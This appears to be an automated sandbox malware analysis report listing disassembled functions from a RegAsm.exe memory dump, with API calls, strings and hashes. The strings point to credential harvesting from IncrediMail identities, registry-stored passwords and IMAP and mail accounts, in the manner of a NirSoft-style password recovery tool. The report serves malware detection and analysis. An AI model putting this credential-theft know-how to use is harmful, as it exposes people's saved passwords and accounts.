                                                                                                                                                                                • sprintf.MSVCRT ref: 00403F9B
                                                                                                                                                                                Strings
                                                                                                                                                                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403EA6
                                                                                                                                                                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F11
                                                                                                                                                                                • <table dir="rtl"><tr><td>, xrefs: 00403F2D
                                                                                                                                                                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F95
                                                                                                                                                                                • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F45
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                                                                                                                                                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                • API String ID: 113626815-1670831295
                                                                                                                                                                                • Opcode ID: f2b6206fe8b071cbe8ffc17d3dc2d1aea0963a4bf855ac14d00f231d57d43f0b
                                                                                                                                                                                • Instruction ID: 68eec6ff6ffa0e14b7f0c60be0e91221167be1d604113ab21f184662466f1ff3
                                                                                                                                                                                • Opcode Fuzzy Hash: f2b6206fe8b071cbe8ffc17d3dc2d1aea0963a4bf855ac14d00f231d57d43f0b
                                                                                                                                                                                • Instruction Fuzzy Hash: 0931A5B3D00258BEEB50DB54CC82FDE77ACEF54305F1001ABF548A3141DA78AB888B69
                                                                                                                                                                                Function 0040955A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • sprintf.MSVCRT ref: 0040957B
                                                                                                                                                                                • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                                                                                                  • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                                                                                                  • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                                                                                                  • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                                                                                                  • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                                                                                                • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                                                                                                • sprintf.MSVCRT ref: 004095EB
                                                                                                                                                                                • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                                                                                                • memset.MSVCRT ref: 0040961C
                                                                                                                                                                                • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                                                                                                • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                                                                                                • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                                                                                • String ID: caption$dialog_%d$menu_%d
                                                                                                                                                                                • API String ID: 3259144588-3822380221
                                                                                                                                                                                • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                                                                                                                • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                                                                                                                • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                                                                                                                • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                                                                                                                Function 004047CB Relevance: 21.0, APIs: 1, Strings: 11, Instructions: 49libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004047DA
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                • API String ID: 1029625771-192783356
                                                                                                                                                                                • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                                                                                                • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                                                                                                                                • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                                                                                                • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                                                                                                                                Function 00404235 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • wcsstr.MSVCRT ref: 0040426A
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                                                                                                • strchr.MSVCRT ref: 004042F6
                                                                                                                                                                                • strlen.MSVCRT ref: 0040430A
                                                                                                                                                                                • sprintf.MSVCRT ref: 0040432B
                                                                                                                                                                                • strchr.MSVCRT ref: 0040433C
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                                                                                • String ID: %s@gmail.com$www.google.com
                                                                                                                                                                                • API String ID: 3866421160-4070641962
                                                                                                                                                                                • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                                                                                                                • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                                                                                                                • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                                                                                                                • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                                                                                                                Function 00409731 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • _mbscpy.MSVCRT(0045A448,?), ref: 00409749
                                                                                                                                                                                • _mbscpy.MSVCRT(0045A550,general,0045A448,?), ref: 00409759
                                                                                                                                                                                  • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                                                                                                  • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                                                                                                  • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                                                                                                                • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                                                                                                                                                                • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                                                                                                                                                                • _mbscpy.MSVCRT(0045A550,strings), ref: 004097A1
                                                                                                                                                                                • memset.MSVCRT ref: 004097BD
                                                                                                                                                                                • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                                                                                                                                                                  • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                                                                • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                                                                                • API String ID: 1035899707-3647959541
                                                                                                                                                                                • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                                                                                                                • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                                                                                                                • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                                                                                                                • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                                                                                                                Function 00410D3D Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • _mbscpy.MSVCRT(?,Common Programs,00410E5B,?,?,?,?,?,00000104), ref: 00410DB0
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _mbscpy
                                                                                                                                                                                • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                • API String ID: 714388716-318151290
                                                                                                                                                                                • Opcode ID: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                                                                                                                                                • Instruction ID: efcd42a8463342e3d8d24718a8e89ec7c05b938a093e831c325fe23e20e40f83
                                                                                                                                                                                • Opcode Fuzzy Hash: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                                                                                                                                                • Instruction Fuzzy Hash: 3FF0D0B1EA8B15E434FC01E8BE06BF220109481B457BC42E7B08AE16DDC8CDF8C2601F
                                                                                                                                                                                Function 0040CA30 Relevance: 18.1, APIs: 12, Instructions: 142windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                                                                                                                                                • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 0040CACC
                                                                                                                                                                                • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                                                                                                                                                • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                                                                                                                                                  • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                                                                                                                                                  • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                                                                                                                                                  • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                                                                                                                                                • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 0040CB35
                                                                                                                                                                                • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                                                                                                                                                • SetFocus.USER32(?), ref: 0040CB92
                                                                                                                                                                                • SetFocus.USER32(?), ref: 0040CC0B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1416211542-0
                                                                                                                                                                                • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                                                                                                • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                                                                                                                                                                                • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                                                                                                • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                                                                                                                                                                                Function 0040E381 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                                                                                • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                                                • API String ID: 2360744853-2229823034
                                                                                                                                                                                • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                                                                                                                • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                                                                                                                • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                                                                                                                • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                                                                                                Function 004100CC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • strchr.MSVCRT ref: 004100E4
                                                                                                                                                                                • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                                                  • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                                                  • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                                                  • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                                                                                                • _mbscat.MSVCRT ref: 0041014D
                                                                                                                                                                                • memset.MSVCRT ref: 00410129
                                                                                                                                                                                  • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                                                                                                  • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                                                                                                • memset.MSVCRT ref: 00410171
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                                                                                                • _mbscat.MSVCRT ref: 00410197
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                                                                                • String ID: \systemroot
                                                                                                                                                                                • API String ID: 912701516-1821301763
                                                                                                                                                                                • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                                                                                                                • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                                                                                                • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                                                                                                                • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                                                                                                Function 0040F802 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 118registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040F84A
                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                                                                                                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Close$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                                                                                                • String ID: Creds$ps:password
                                                                                                                                                                                • API String ID: 313032062-1872227768
                                                                                                                                                                                • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                                                                                                                • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                                                                                                                                                • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                                                                                                                • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                                                                                                                                                Function 00402FDB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 106registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                • memset.MSVCRT ref: 0040301E
                                                                                                                                                                                  • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                • memset.MSVCRT ref: 0040306B
                                                                                                                                                                                • sprintf.MSVCRT ref: 00403083
                                                                                                                                                                                • memset.MSVCRT ref: 004030B4
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004030FC
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00403125
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$Close$EnumOpensprintf
                                                                                                                                                                                • String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
                                                                                                                                                                                • API String ID: 3672803090-3168940695
                                                                                                                                                                                • Opcode ID: c9eb44310dfb29f03ef0e10aa8539b91ddc0c6df349914104ac0254ae78c74f6
                                                                                                                                                                                • Instruction ID: c63447841566cf46c771af6046a8c2292ff1b2fb78a85e5f221a3b25c3a6e5c2
                                                                                                                                                                                • Opcode Fuzzy Hash: c9eb44310dfb29f03ef0e10aa8539b91ddc0c6df349914104ac0254ae78c74f6
                                                                                                                                                                                • Instruction Fuzzy Hash: 8C3140B280121CBEDB11EF91CC81EDEBB7CEF14345F0440A6B908A1052E7799F959FA4
                                                                                                                                                                                Function 00408F1B Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowstringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
                                                                                                                                                                                • String ID: 0$6
                                                                                                                                                                                • API String ID: 3540791495-3849865405
                                                                                                                                                                                • Opcode ID: 746a6444b456afcb3e36d1fa8bdf2724fef8bbe8bc7db3e616028793154f0cb8
                                                                                                                                                                                • Instruction ID: 99806e288156f34ba132e8f36af0febe6860c11fee4b77973fd999a480d51a7c
                                                                                                                                                                                • Opcode Fuzzy Hash: 746a6444b456afcb3e36d1fa8bdf2724fef8bbe8bc7db3e616028793154f0cb8
                                                                                                                                                                                • Instruction Fuzzy Hash: 7631B172408385AFD720DF51D841A9BBBE9FB84314F04483FF69492292D779D944CF5A
                                                                                                                                                                                Function 004108E5 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                                • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                                                                                                                • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00410970
                                                                                                                                                                                Strings
                                                                                                                                                                                • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                                                                                                                • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                                                                                                                • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                                                                                                                • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                                • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                                                                                • API String ID: 1640410171-2022683286
                                                                                                                                                                                • Opcode ID: a6622c3935392687b7cdf7bff07cfba8d523efe949d3c24d6b26d746122f1250
                                                                                                                                                                                • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                                                                                                                                                • Opcode Fuzzy Hash: a6622c3935392687b7cdf7bff07cfba8d523efe949d3c24d6b26d746122f1250
                                                                                                                                                                                • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                                                                                                                                                Function 004196A1 Relevance: 15.3, APIs: 6, Strings: 4, Instructions: 321COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                                                                                                                • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                                                                                                                • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$strlen
                                                                                                                                                                                • String ID: -journal$-wal$immutable$nolock
                                                                                                                                                                                • API String ID: 2619041689-3408036318
                                                                                                                                                                                • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                                                • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                                                                                                                • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                                                • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                                                                                                                Function 004019EA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$strlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 667451143-3916222277
                                                                                                                                                                                • Opcode ID: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                                                                                                                                                                • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                                                                                                                                                                • Opcode Fuzzy Hash: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                                                                                                                                                                • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                                                                                                                                                                Function 004086E0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 155COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
